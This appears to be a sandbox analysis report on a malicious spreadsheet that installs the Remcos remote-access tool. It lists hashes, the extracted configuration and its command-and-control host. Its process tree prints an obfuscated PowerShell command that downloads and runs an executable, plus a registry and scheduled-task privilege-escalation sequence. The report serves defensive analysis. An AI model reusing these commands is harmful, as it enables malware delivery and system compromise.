Analysis
-
max time kernel
150s -
max time network
149s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
25-08-2021 20:11
General
-
Target
Chase Direct Deposit.xls
-
Size
116KB
-
MD5
89da2874a518638c7f5ec30a286f4167
-
SHA1
c766aba3be2f450a8059b4754fed706730321f4d
-
SHA256
4816d1e51c489e591d7d3d9aeba4cb7a494a97f27bba7a90d45bbe0e1b85a829
-
SHA512
390e3e89026436fff0fa646cc111df980cc5f5ef29b4c3ee1f857de426e643d10bf77f469424ab17a500dd8b575d62af5dea34d42c36a6ab905674c04797c21d
Malware Config
Extracted
remcos
3.2.0 Pro
Augusta
twistednerd.dvrlists.com:8618
-
audio_folder
MicRecords
-
audio_path
%AppData%
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
install_path
%AppData%
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
keylog_path
%AppData%
-
mouse_option
false
-
mutex
Augusta-LF4SC3
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
startup_value
Remcos
-
take_screenshot_option
false
-
take_screenshot_time
5
-
take_screenshot_title
notepad;solitaire;
Signatures
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Remcos
Remcos is a closed-source remote control and surveillance software.
-
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
-
Nirsoft 1 IoCs
-
Blocklisted process makes network request 1 IoCs
-
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Suspicious use of SetThreadContext 2 IoCs
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Modifies registry key 1 TTPs 3 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 9 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of SetWindowsHookEx 12 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Chase Direct Deposit.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $v78df0=(00100100,01110111,01100101,00110010,00110010,00111101,00100111,00101000,01001110,01100101,01110111,00101101,01001111,01100010,01101010,01100101,00100111,00100000,00101011,00100000,00100111,01100011,01110100,00100000,01001110,01100101,01110100,00101110,01010111,01100101,00100111,00111011,00100000,00100100,01100010,00110100,01100100,01100110,00111101,00100111,01100010,01000011,01101100,00100111,00100000,00101011,00100000,00100111,01101001,01100101,01101110,01110100,00101001,00101110,01000100,01101111,01110111,01101110,01101100,01101111,00100111,00111011,00100000,00100100,01100011,00110011,00111101,00100111,01100001,01100100,01000110,01101001,01101100,01100101,00101000,00100111,00100111,01101000,01110100,01110100,01110000,00111010,00101111,00101111,00110001,00111001,00111000,00101110,00110010,00110011,00101110,00110010,00110101,00110001,00101110,00110001,00110001,00110000,00101111,01100010,01101001,01101100,01101100,00101110,01100101,01111000,01100101,00100111,00100111,00101100,00100100,01100101,01101110,01110110,00111010,01110100,01100101,01101101,01110000,00101011,00100111,00100111,01011100,01100010,01101001,01101100,01101100,00101110,01100101,01111000,01100101,00100111,00100111,00101001,00100111,00111011,00111011,00100100,01010100,01000011,00111101,00100100,01110111,01100101,00110010,00110010,00101100,00100100,01100010,00110100,01100100,01100110,00101100,00100100,01100011,00110011,00100000,00101101,01001010,01101111,01101001,01101110,00100000,00100111,00100111,00111011,01001001,01000101,01011000,00101000,00100100,01010100,01000011,00101001,00111011,01110011,01110100,01100001,01110010,01110100,00101101,01110000,01110010,01101111,01100011,01100101,01110011,01110011,00101000,00100100,01100101,01101110,01110110,00111010,01110100,01100101,01101101,01110000,00101011,00100000,00100111,01011100,01100010,01101001,01101100,01101100,00101110,01100101,01111000,01100101,00100111,00101001) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };[system.String]::Join('', $v78df0)|IEX2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\bill.exe"C:\Users\Admin\AppData\Local\Temp\bill.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\bill.exeC:\Users\Admin\AppData\Local\Temp\bill.exe4⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"5⤵
- Suspicious use of SetThreadContext
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe" /stext "C:\Users\Admin\AppData\Local\Temp\tlhpggvgxfqugbwyyhiqfip"6⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe" /stext "C:\Users\Admin\AppData\Local\Temp\wnmihyoztnizjhkchsdjqukaxd"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe" /stext "C:\Users\Admin\AppData\Local\Temp\ghzshrzbhvamtngozcqltzeryrynop"6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\Trast.bat" "5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat6⤵
-
C:\Windows\SysWOW64\reg.exereg delete hkcu\Environment /v windir /f7⤵
- Modifies registry key
-
C:\Windows\SysWOW64\reg.exereg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM "7⤵
- Modifies registry key
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I7⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\nest.bat" "5⤵
-
C:\Windows\SysWOW64\reg.exereg delete hkcu\Environment /v windir /f6⤵
- Modifies registry key
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\bill.exeMD5
27ee757d743631d49dcb3c6d7c90dfbe
SHA12b356d2090ea481e38fdf1e78dac05b74c4818f0
SHA256dc1bb96ddee60e15d3344fc4b0413634a54974ef9e854628157800c9d695f028
SHA512871222583adde8b8f469dba61dfa8a25df04d7c3f9eb3867441928898df7c7bc92ecaa6aa8619d78c604589637670d4f732294d574a748aa9fdf0294aeff08e1
-
C:\Users\Admin\AppData\Local\Temp\bill.exeMD5
27ee757d743631d49dcb3c6d7c90dfbe
SHA12b356d2090ea481e38fdf1e78dac05b74c4818f0
SHA256dc1bb96ddee60e15d3344fc4b0413634a54974ef9e854628157800c9d695f028
SHA512871222583adde8b8f469dba61dfa8a25df04d7c3f9eb3867441928898df7c7bc92ecaa6aa8619d78c604589637670d4f732294d574a748aa9fdf0294aeff08e1
-
C:\Users\Admin\AppData\Local\Temp\bill.exeMD5
27ee757d743631d49dcb3c6d7c90dfbe
SHA12b356d2090ea481e38fdf1e78dac05b74c4818f0
SHA256dc1bb96ddee60e15d3344fc4b0413634a54974ef9e854628157800c9d695f028
SHA512871222583adde8b8f469dba61dfa8a25df04d7c3f9eb3867441928898df7c7bc92ecaa6aa8619d78c604589637670d4f732294d574a748aa9fdf0294aeff08e1
-
C:\Users\Admin\AppData\Local\Temp\tlhpggvgxfqugbwyyhiqfipMD5
93d9547e2f6b166ddc13b0f852378d78
SHA19c252ab52886c3e59e832b316bade26fe3473c74
SHA2560e2229e3ecc706a74a1048c7e395644542a880183d9f6809260410d618dbed1d
SHA51281711df6173b9020a004eabd398e4c1f0c092c42ab6888db122dfe2e582c04826025972f06867d207de7f4cb4d15d57afa219aebcbb9c966961696dca93d3298
-
C:\Users\Public\Trast.batMD5
4068c9f69fcd8a171c67f81d4a952a54
SHA14d2536a8c28cdcc17465e20d6693fb9e8e713b36
SHA25624222300c78180b50ed1f8361ba63cb27316ec994c1c9079708a51b4a1a9d810
SHA512a64f9319acc51fffd0491c74dcd9c9084c2783b82f95727e4bfe387a8528c6dcf68f11418e88f1e133d115daf907549c86dd7ad866b2a7938add5225fbb2811d
-
C:\Users\Public\UKO.batMD5
eaf8d967454c3bbddbf2e05a421411f8
SHA16170880409b24de75c2dc3d56a506fbff7f6622c
SHA256f35f2658455a2e40f151549a7d6465a836c33fa9109e67623916f889849eac56
SHA512fe5be5c673e99f70c93019d01abb0a29dd2ecf25b2d895190ff551f020c28e7d8f99f65007f440f0f76c5bcac343b2a179a94d190c938ea3b9e1197890a412e9
-
C:\Users\Public\nest.batMD5
8ada51400b7915de2124baaf75e3414c
SHA11a7b9db12184ab7fd7fce1c383f9670a00adb081
SHA25645aa3957c29865260a78f03eef18ae9aebdbf7bea751ecc88be4a799f2bb46c7
SHA5129afc138157a4565294ca49942579cdb6f5d8084e56f9354738de62b585f4c0fa3e7f2cbc9541827f2084e3ff36c46eed29b46f5dd2444062ffcd05c599992e68
-
memory/2424-318-0x00000000001F0000-0x00000000001F1000-memory.dmpFilesize
4KB
-
memory/2424-312-0x0000000000000000-mapping.dmp
-
memory/2424-317-0x00000000001C0000-0x00000000001C1000-memory.dmpFilesize
4KB
-
memory/2424-319-0x0000000000750000-0x000000000089A000-memory.dmpFilesize
1.3MB
-
memory/2752-121-0x00007FF87AD20000-0x00007FF87BE0E000-memory.dmpFilesize
16.9MB
-
memory/2752-114-0x00007FF6FCC00000-0x00007FF7001B6000-memory.dmpFilesize
53.7MB
-
memory/2752-289-0x000001DA12660000-0x000001DA12664000-memory.dmpFilesize
16KB
-
memory/2752-123-0x00007FF878E20000-0x00007FF87AD15000-memory.dmpFilesize
31.0MB
-
memory/2752-122-0x00007FF85A170000-0x00007FF85A180000-memory.dmpFilesize
64KB
-
memory/2752-118-0x00007FF85A170000-0x00007FF85A180000-memory.dmpFilesize
64KB
-
memory/2752-117-0x00007FF85A170000-0x00007FF85A180000-memory.dmpFilesize
64KB
-
memory/2752-116-0x00007FF85A170000-0x00007FF85A180000-memory.dmpFilesize
64KB
-
memory/2752-115-0x00007FF85A170000-0x00007FF85A180000-memory.dmpFilesize
64KB
-
memory/2904-306-0x0000000000000000-mapping.dmp
-
memory/2904-310-0x00000000022F0000-0x00000000022F1000-memory.dmpFilesize
4KB
-
memory/2904-314-0x0000000010410000-0x000000001042B000-memory.dmpFilesize
108KB
-
memory/3756-291-0x0000018A71013000-0x0000018A71015000-memory.dmpFilesize
8KB
-
memory/3756-297-0x0000018A71016000-0x0000018A71018000-memory.dmpFilesize
8KB
-
memory/3756-286-0x0000018A70F90000-0x0000018A70F91000-memory.dmpFilesize
4KB
-
memory/3756-276-0x0000000000000000-mapping.dmp
-
memory/3756-292-0x0000018A711A0000-0x0000018A711A1000-memory.dmpFilesize
4KB
-
memory/3756-290-0x0000018A71010000-0x0000018A71012000-memory.dmpFilesize
8KB
-
memory/4584-331-0x0000000010590000-0x000000001060C000-memory.dmpFilesize
496KB
-
memory/4584-320-0x0000000000000000-mapping.dmp
-
memory/4584-329-0x0000000000400000-0x0000000000401000-memory.dmpFilesize
4KB
-
memory/4584-328-0x0000000000140000-0x0000000000141000-memory.dmpFilesize
4KB
-
memory/4584-330-0x00000000001A0000-0x00000000001A1000-memory.dmpFilesize
4KB
-
memory/4584-332-0x0000000000410000-0x0000000000489000-memory.dmpFilesize
484KB
-
memory/4624-321-0x0000000000000000-mapping.dmp
-
memory/4680-323-0x0000000000000000-mapping.dmp
-
memory/4732-325-0x0000000000000000-mapping.dmp
-
memory/4752-326-0x0000000000000000-mapping.dmp
-
memory/4772-327-0x0000000000000000-mapping.dmp
-
memory/4828-334-0x0000000000476274-mapping.dmp
-
memory/4828-333-0x0000000000400000-0x0000000000478000-memory.dmpFilesize
480KB
-
memory/4828-341-0x0000000000400000-0x0000000000478000-memory.dmpFilesize
480KB
-
memory/4844-338-0x0000000000422206-mapping.dmp
-
memory/4844-337-0x0000000000400000-0x0000000000424000-memory.dmpFilesize
144KB
-
memory/4844-342-0x0000000000400000-0x0000000000424000-memory.dmpFilesize
144KB
-
memory/4924-344-0x0000000000000000-mapping.dmp
-
memory/4976-346-0x0000000000000000-mapping.dmp